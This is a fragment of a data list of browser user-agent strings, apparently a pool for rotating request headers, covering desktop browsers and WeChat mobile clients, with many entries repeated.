"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
